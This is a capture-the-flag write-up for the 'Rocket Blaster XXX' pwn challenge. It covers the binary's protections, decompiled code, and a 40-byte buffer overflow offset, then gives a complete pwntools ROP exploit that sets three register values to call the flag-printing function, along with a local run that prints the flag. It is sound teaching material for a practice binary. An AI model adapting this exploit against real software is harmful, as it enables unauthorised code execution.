# Rocket Blaster XXX Information gathering ``` [*] '/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster/rocket_blaster_xxx' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: b'./glibc/' ``` Relro and NX enable (can't shellcode inject). Let's disassemble using ghidra ``` // main undefined8 main(void) { undefined8 local_28; undefined8 local_20; undefined8 local_18; undefined8 local_10; banner(); local_28 = 0; local_20 = 0; local_18 = 0; local_10 = 0; fflush(stdout); printf( "\nPrepare for trouble and make it double, or triple..\n\nYou need to place the ammo in the right place to load the Rocket Blaster XXX!\n\n>> " ); fflush(stdout); read(0,&local_28,102); puts("\nPreparing beta testing.."); return 0; } ``` Potential BOF in read(), ``` //fill_ammo void fill_ammo(long param_1,long param_2,long param_3) { ssize_t sVar1; char local_d; int local_c; local_c = open("./flag.txt",0); if (local_c < 0) { perror("\nError opening flag.txt, please contact an Administrator.\n"); /* WARNING: Subroutine does not return */ exit(1); } if (param_1 != 0xdeadbeef) { printf("%s[x] [-] [-]\n\n%sPlacement 1: %sInvalid!\n\nAborting..\n",&DAT_00402010,&DAT_00402 008, &DAT_00402010); /* WARNING: Subroutine does not return */ exit(1); } if (param_2 != 0xdeadbabe) { printf(&DAT_004020c0,&DAT_004020b6,&DAT_00402010,&DAT_00402008,&DAT_00402010); /* WARNING: Subroutine does not return */ exit(2); } if (param_3 != 0xdead1337) { printf(&DAT_00402100,&DAT_004020b6,&DAT_00402010,&DAT_00402008,&DAT_00402010); /* WARNING: Subroutine does not return */ exit(3); } printf(&DAT_00402140,&DAT_004020b6); fflush(stdin); fflush(stdout); while( true ) { sVar1 = read(local_c,&local_d,1); if (sVar1 < 1) break; fputc((int)local_d,stdout); } close(local_c); fflush(stdin); fflush(stdout); return; } ``` So from this func, the flow attack is clearly. Is basic ROP attack with 3 argument. Serch the offset ``` gef➤ pattern search $rsp [+] Searching for '6661616161616161'/'6161616161616166' with period=8 [+] Found at offset 40 (little-endian search) likely gef➤ ``` So this my payload, ```python #!/usr/bin/env python3 from pwn import * exe = ELF("./rocket_blaster_xxx") rop = ROP(exe) context.binary = exe def conn(): if args.LOCAL: r = process([exe.path]) if args.DEBUG: gdb.attach(r) else: r = remote("addr", 1337) return r offset = 40 pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0] pop_rdx = rop.find_gadget(['pop rdx', 'ret'])[0] ret_gadget = rop.find_gadget(['ret'])[0] def main(): r = conn() payload = flat({ 40 : [ p64(pop_rdi), p64(0xdeadbeef), p64(pop_rsi), p64(0xdeadbabe), p64(pop_rdx), p64(0xdead1337), p64(ret_gadget), p64(exe.sym.fill_ammo) ] }) r.sendlineafter(b'>> ', payload) info(f'pop rdi -> {hex(pop_rdi)}') info(f'pop rsi -> {hex(pop_rsi)}') info(f'pop rdx -> {hex(pop_rdx)}') info(f'fill ammo address -> {hex(exe.sym.fill_ammo)}') # good luck pwning :) r.interactive() if __name__ == "__main__": main() ``` Result ``` m1kasha@Lanz:/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster$ python3 solve.py LOCAL [*] '/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster/rocket_blaster_xxx' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: b'./glibc/' [*] Loaded 8 cached gadgets for './rocket_blaster_xxx' [+] Starting local process '/mnt/d/CTF/cyber-apocalypse-2024/pwn/rocket-blaster/rocket_blaster_xxx': pid 2870 [*] pop rdi -> 0x40159f [*] pop rsi -> 0x40159d [*] pop rdx -> 0x40159b [*] fill ammo address -> 0x4012f5 [*] Switching to interactive mode Preparing beta testing.. [✓] [✓] [✓] All Placements are set correctly! Ready to launch at: HTB{b00m_b00m_r0ck3t_2_th3_m00n} [*] Got EOF while reading in interactive $ ```